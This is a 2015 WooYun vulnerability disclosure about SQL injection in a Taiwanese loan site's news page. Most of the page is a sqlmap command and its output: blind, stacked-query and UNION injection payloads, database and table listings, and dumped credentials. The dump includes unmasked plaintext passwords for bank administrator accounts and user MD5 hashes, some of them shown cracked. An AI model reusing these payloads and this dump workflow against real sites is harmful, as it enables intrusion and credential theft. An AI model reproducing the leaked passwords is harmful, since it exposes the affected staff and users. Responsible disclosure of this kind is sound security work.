当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0152888

漏洞标题:臺灣幸福租某處存在SQL註入漏洞(136萬日誌泄露/各大銀行管理的明文密碼及通訊郵箱泄露/用戶真實姓名及密碼泄露)(臺灣地區)

相关厂商:臺灣幸福租

漏洞作者: 路人甲

提交时间:2015-11-08 23:14

修复时间:2015-12-27 18:42

公开时间:2015-12-27 18:42

漏洞类型:

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-08: 细节已通知厂商并且等待厂商处理中
2015-11-12: 厂商已经确认,细节仅向厂商公开
2015-11-22: 细节向核心白帽子及相关领域专家公开
2015-12-02: 细节向普通白帽子公开
2015-12-12: 细节向实习白帽子公开
2015-12-27: 细节向公众公开

简要描述:

臺灣幸福租某處存在SQL註入漏洞(136萬日誌泄露/各大銀行管理的明文密碼及通訊郵箱泄露/用戶真實姓名及密碼泄露)

详细说明:

地址:http://**.**.**.**/newsDetail.php?id=35639

python sqlmap.py -u "http://**.**.**.**/newsDetail.php?id=35639" -p id --technique=BSU -D LoanDB -T tBankLoing -C b_id,b_name,b_pass,b_mail --dump


Database: TWHG_NEWS
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| LiteraryCount | 1360221 |


Database: LoanDB
Table: tBankLoing
[14 entries]
mask 区域
*****---+-----------*****
***** | b_mail *****
*****---+-----------*****
***** | [email protected]**.*****
*****i | [email protected]*******
*****ed | [email protected]******
*****456789 | [email protected]*******
*****05 | 94196*****
*****ac | [email protected]******
*****irstbank | i1*****
*****888 | heroki.tsa*****
*****athaybk | nt13*****
*****6 | [email protected]**.******
*****0130710 | 2987*****
*****egabank | honw*****
*****hinatrust | pearl.*****
*****6 | [email protected]*******


+------+----------+-------------+------------------------------+


Database: TWHG_NEWS
Table: User
[34 entries]
+----------+-------------------------------------------+
| UserName | UserPassword |
+----------+-------------------------------------------+
mask 区域
*****4ebb619b556f526*****
*****bad9e18e2f1b58e*****
*****438925a76754a24*****
*****2d58baf6f4f5365*****
*****41245ac84928ada*****
*****6c3071c1850bf10*****
*****5876486b9350ce5*****
*****7e649ebc8cf1a40*****
*****23e32b34d30224*****
*****3e3934ed92c88d*****
*****d51eec5559b68f*****
*****f79c8a86662af9*****
*****e00b786c6686862*****
*****abbe56e057f20f*****
*****af5688634085072*****
*****c20036dbd8313e*****
*****d04dc20036dbd83*****
*****d04dc20036dbd83*****
*****48d57bf3e548cc*****
*****bbeed946fc96501*****
*****56bef9cd0569d7a*****
*****822642b0f61ee4*****
*****b8ef59757e2883e*****
*****97b568c54430fd3*****
*****465aa15d4cc2d69*****
*****41f2fb6dc18a91c*****
*****901310fe2388d4*****
*****e011c1b88bcd41b*****
*****739b109746896b4*****
*****1c90b23add03c63*****
*****e9d678a6c54ab7c*****
*****1e7abbb9fd5a378*****
*****6c13ed2311da438*****
*****790b78152996d2a*****


+----------+-------------------------------------------+

漏洞证明:

---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=35639 AND 3610=3610
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
Payload: id=35639;(SELECT * FROM (SELECT(SLEEP(5)))RbQh)#
Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: id=-3508 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71707a6a71,0x54696b4e4642465348577768554a647169714766684b724e444350514a6a4d6b6a5462484b457766,0x716b706271)-- -
---
web application technology: Apache
back-end DBMS: MySQL 5.0.11
current user: '[email protected]%'
current user is DBA: False
database management system users [1]:
[*] 'twhgNews'@'%'
Database: information_schema
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| COLUMNS | 766 |
| GLOBAL_VARIABLES | 272 |
| SESSION_VARIABLES | 272 |
| GLOBAL_STATUS | 268 |
| SESSION_STATUS | 268 |
| COLLATION_CHARACTER_SET_APPLICABILITY | 128 |
| COLLATIONS | 127 |
| PROCESSLIST | 87 |
| PARTITIONS | 67 |
| TABLES | 67 |
| STATISTICS | 59 |
| KEY_COLUMN_USAGE | 39 |
| TABLE_CONSTRAINTS | 39 |
| CHARACTER_SETS | 36 |
| PLUGINS | 6 |
| ENGINES | 5 |
| SCHEMA_PRIVILEGES | 4 |
| SCHEMATA | 3 |
| USER_PRIVILEGES | 1 |
+---------------------------------------+---------+
Database: LoanDB
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| tBankCont | 4294 |
| tBankCick | 1120 |
| tBankLoginLog | 516 |
| tBankOperateLog | 411 |
| tBankRate | 78 |
| tBankAd | 45 |
| tBankLoing | 14 |
| tBankSale | 13 |
+---------------------------------------+---------+
Database: TWHG_NEWS
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| LiteraryCount | 1360221 |
| FB_Count | 235285 |
| OperateLog | 51225 |
| Literary | 35611 |
| LiteraryContent | 16901 |
| Photo | 6604 |
| LoginLog | 4209 |
| ThingFilter2 | 714 |
| Video | 520 |
| tZip | 373 |
| Message | 351 |
| ArticleWord | 263 |
| Literary_Preview | 157 |
| ThingFilter | 73 |
| Girls | 38 |
| `User` | 34 |
| LiterarySubClass | 27 |
| VideoSubClass | 23 |
| NewsClassD | 17 |
| Famous | 16 |
| WomanMainClass | 10 |
| LiteraryMainClass | 8 |
| Trend | 6 |
| Logo | 5 |
| VideoMainClass | 5 |
| WomanHome | 4 |
| Photo_Temp | 2 |
| PostCount | 2 |
+---------------------------------------+---------+
columns LIKE 'pass' were found in the following databases:
Database: LoanDB
Table: tBankLoing
[1 column]
+--------+----------+
| Column | Type |
+--------+----------+
| b_pass | char(30) |
+--------+----------+
Database: TWHG_NEWS
Table: User
[1 column]
+--------------+-------------+
| Column | Type |
+--------------+-------------+
| UserPassword | varchar(40) |
+--------------+-------------+
Database: LoanDB
Table: tBankLoing
[14 entries]
+-------------+
| b_pass |
+-------------+
| 123456 |
| 123456 |
| 123456 |
| 20130710 |
| cathaybk |
| chartered |
| chinatrust |
| firstbank |
| fubon888 |
| megabank |
| ml123456789 |
| shanghai |
| sinopac |
| tai05 |
+-------------+
Database: TWHG_NEWS
Table: User
[34 entries]
+-------------------------------------------+
| UserPassword |
+-------------------------------------------+
| 02896722b32d58baf6f4f5365ddc3651 |
| 0a5988c14956bef9cd0569d7a719506d |
| 0cbf2f9ccca132f79c8a86662af9c1a1 |
| 14c13539326c13ed2311da438ab870e3 |
| 1775ea192de1833e3934ed92c88d7aa7 |
| 20ff12a277344c48d57bf3e548cc2693 |
| 305c6731866925822642b0f61ee46126 |
| 3704dde2d21c90b23add03c636fb9e5a |
| 48a57eceb3bad9e18e2f1b58e7f6cadd (530417) |
| 49122b2b64af56886340850722ccc944 |
| 496092f628e011c1b88bcd41b47cc070 |
| 49c3eae36097b568c54430fd37fa741b |
| 4eaa8414c2739b109746896b43cf4214 |
| 517960763f6c3071c1850bf105084c35 |
| 56e62457831e7abbb9fd5a3781088d7f |
| 5f701bdd38465aa15d4cc2d694af04b6 |
| 674c459441b7d1901310fe2388d4d96a |
| 6d19abde21e00b786c6686862282081e |
| 6d5c4112df438925a76754a244fb1929 |
| 703516008441f2fb6dc18a91c092c0de |
| 77970952f3790b78152996d2ad1da052 |
| 81dc9bdb52d04dc20036dbd8313ed055 (1234) |
| 81dc9bdb52d04dc20036dbd8313ed055 (1234) |
| 81dc9bdb52d04dc20036dbd8313ed055 (1234) |
| 88bf1873e341245ac84928adaba38a36 |
| 93279e3308bdbbeed946fc965017f67a (121212) |
| a3b34c0871dc2fd51eec5559b68f709d (play) |
| aca877be7e4ebb619b556f5267e8aa02 |
| db1b4e5e915876486b9350ce5048cb58 |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e2981c8c9be9d678a6c54ab7c837bcf8 |
| f3a8e7f0af7e649ebc8cf1a40f1d0f5f |
| f5aa69b2f0241323e32b34d30224e26d |
| f6211163fbb8ef59757e2883e1017280 |
+-------------------------------------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=35639 AND 3610=3610
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
Payload: id=35639;(SELECT * FROM (SELECT(SLEEP(5)))RbQh)#
Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: id=-3508 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71707a6a71,0x54696b4e4642465348577768554a647169714766684b724e444350514a6a4d6b6a5462484b457766,0x716b706271)-- -
---
web application technology: Apache
back-end DBMS: MySQL 5.0.11
Database: TWHG_NEWS
Table: LiteraryCount
[5 columns]
+----------+--------------+
| Column | Type |
+----------+--------------+
| id | int(6) |
| L_create | timestamp |
| L_id | int(6) |
| L_Number | int(5) |
| L_sub | varchar(200) |
+----------+--------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=35639 AND 3610=3610
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
Payload: id=35639;(SELECT * FROM (SELECT(SLEEP(5)))RbQh)#
Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: id=-3508 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71707a6sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=35639 AND 3610=3610
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
Payload: id=35639;(SELECT * FROM (SELECT(SLEEP(5)))RbQh)#
Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: id=-3508 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71707a6a71,0x54696b4e4642465348577768554a647169714766684b724e444350514a6a4d6b6a5462484b457766,0x716b706271)-- -
---
web application technology: Apache
back-end DBMS: MySQL 5.0.11
Database: TWHG_NEWS
Table: LiteraryCount
[10 entries]
+----+---------------------+-------+----------+---------+
| id | L_create | L_id | L_Number | L_sub |
+----+---------------------+-------+----------+---------+
| 1 | 2013-03-18 19:48:19 | 27661 | 0 | <blank> |
| 2 | 2013-03-19 00:39:43 | 27655 | 0 | <blank> |
| 3 | 2013-03-19 00:41:12 | 27652 | 0 | <blank> |
| 4 | 2013-03-19 00:41:17 | 27653 | 0 | <blank> |
| 5 | 2013-03-19 00:41:22 | 27654 | 0 | <blank> |
| 6 | 2013-03-19 00:41:27 | 27656 | 0 | <blank> |
| 7 | 2013-03-19 09:10:27 | 27660 | 0 | <blank> |
| 8 | 2013-03-19 09:32:14 | 27661 | 0 | <blank> |
| 9 | 2013-03-19 09:32:20 | 27651 | 0 | <blank> |
| 10 | 2013-03-19 09:32:24 | 27661 | 0 | <blank> |
+----+---------------------+-------+----------+---------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=35639 AND 3610=3610
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
Payload: id=35639;(SELECT * FROM (SELECT(SLEEP(5)))RbQh)#
Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: id=-3508 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71707a6a71,0x54696b4e4642465348577768554a647169714766684b724e444350514a6a4d6b6a5462484b457766,0x716b706271)-- -
---
web application technology: Apache
back-end DBMS: MySQL 5.0.11
Database: TWHG_NEWS
Table: User
[25 columns]
+------------------+-------------+
| Column | Type |
+------------------+-------------+
| ChangeDate | datetime |
| CreateDate | datetime |
| FamousAdd | int(11) |
| FamousDelete | int(11) |
| FamousEdit | int(11) |
| GirlEdit | int(11) |
| GirlHome | int(11) |
| Grade | int(11) |
| HomeLiteraryEdit | int(11) |
| ID | int(11) |
| LiteraryAdd | int(11) |
| LiteraryDelete | int(11) |
| LiteraryEdit | int(11) |
| Status | int(11) |
| StoreID | int(11) |
| TrendEdit | int(11) |
| UserAccount | varchar(30) |
| UserAdd | int(11) |
| UserDelete | int(11) |
| UserEdit | int(11) |
| UserName | varchar(40) |
| UserPassword | varchar(40) |
| VideoAdd | int(11) |
| VideoDelete | int(11) |
| VideoEdit | int(11) |
+------------------+-------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=35639 AND 3610=3610
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
Payload: id=35639;(SELECT * FROM (SELECT(SLEEP(5)))RbQh)#
Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: id=-3508 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71707a6a71,0x54696b4e4642465348577768554a647169714766684b724e444350514a6a4d6b6a5462484b457766,0x716b706271)-- -
---
web application technology: Apache
back-end DBMS: MySQL 5.0.11
Database: TWHG_NEWS
Table: User
[34 entries]
+----------+-------------------------------------------+
| UserName | UserPassword |
+----------+-------------------------------------------+
mask 区域
*****4ebb619b556f526*****
*****bad9e18e2f1b58e*****
*****438925a76754a24*****
*****2d58baf6f4f5365*****
*****41245ac84928ada*****
*****6c3071c1850bf10*****
*****5876486b9350ce5*****
*****7e649ebc8cf1a40*****
*****23e32b34d30224*****
*****3e3934ed92c88d*****
*****d51eec5559b68f*****
*****f79c8a86662af9*****
*****e00b786c6686862*****
*****abbe56e057f20f*****
*****af5688634085072*****
*****c20036dbd8313e*****
*****d04dc20036dbd83*****
*****d04dc20036dbd83*****
*****48d57bf3e548cc*****
*****bbeed946fc96501*****
*****56bef9cd0569d7a*****
*****822642b0f61ee4*****
*****b8ef59757e2883e*****
*****97b568c54430fd3*****
*****465aa15d4cc2d69*****
*****41f2fb6dc18a91c*****
*****901310fe2388d4*****
*****e011c1b88bcd41b*****
*****739b109746896b4*****
*****1c90b23add03c63*****
*****e9d678a6c54ab7c*****
*****1e7abbb9fd5a378*****
*****6c13ed2311da438*****
*****790b78152996d2a*****


+----------+-------------------------------------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=35639 AND 3610=3610
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
Payload: id=35639;(SELECT * FROM (SELECT(SLEEP(5)))RbQh)#
Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: id=-3508 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71707a6a71,0x54696b4e4642465348577768554a647169714766684b724e444350514a6a4d6b6a5462484b457766,0x716b706271)-- -
---
web application technology: Apache
back-end DBMS: MySQL 5.0.11
Database: LoanDB
Table: tBankLoing
[15 columns]
+-------------+--------------+
| Column | Type |
+-------------+--------------+
| b_ab | int(2) |
| b_accut | char(20) |
| b_authority | int(3) |
| b_id | int(6) |
| b_mail | varchar(100) |
| b_name | varchar(40) |
| b_online | char(2) |
| b_pass | char(30) |
| b_pic | varchar(20) |
| b_url | varchar(200) |
| bScr | int(1) |
| ch_T | datetime |
| r_id | varchar(50) |
| up_t | timestamp |
| who_ch | int(6) |
+-------------+--------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=35639 AND 3610=3610
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
Payload: id=35639;(SELECT * FROM (SELECT(SLEEP(5)))RbQh)#
Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: id=-3508 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71707a6a71,0x54696b4e4642465348577768554a647169714766684b724e444350514a6a4d6b6a5462484b457766,0x716b706271)-- -
---
web application technology: Apache
back-end DBMS: MySQL 5.0.11
Database: LoanDB
Table: tBankLoing
[14 entries]
+------+----------+-------------+------------------------------+
| b_id | b_name | b_pass | b_mail |
+------+----------+-------------+------------------------------+

mask 区域
*****   | [email protected]**.*****
*****i | [email protected]*******
*****ed | [email protected]******
*****456789 | [email protected]*******
*****05 | 94196*****
*****ac | [email protected]******
*****irstbank | i1*****
*****888 | heroki.tsa*****
*****athaybk | nt13*****
*****6 | [email protected]**.******
*****0130710 | 2987*****
*****egabank | honw*****
*****hinatrust | pearl.*****
*****6 | [email protected]*******


+------+----------+-------------+------------------------------+

修复方案:

上WAF。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-11-12 18:40

厂商回复:

感謝通報

最新状态:

暂无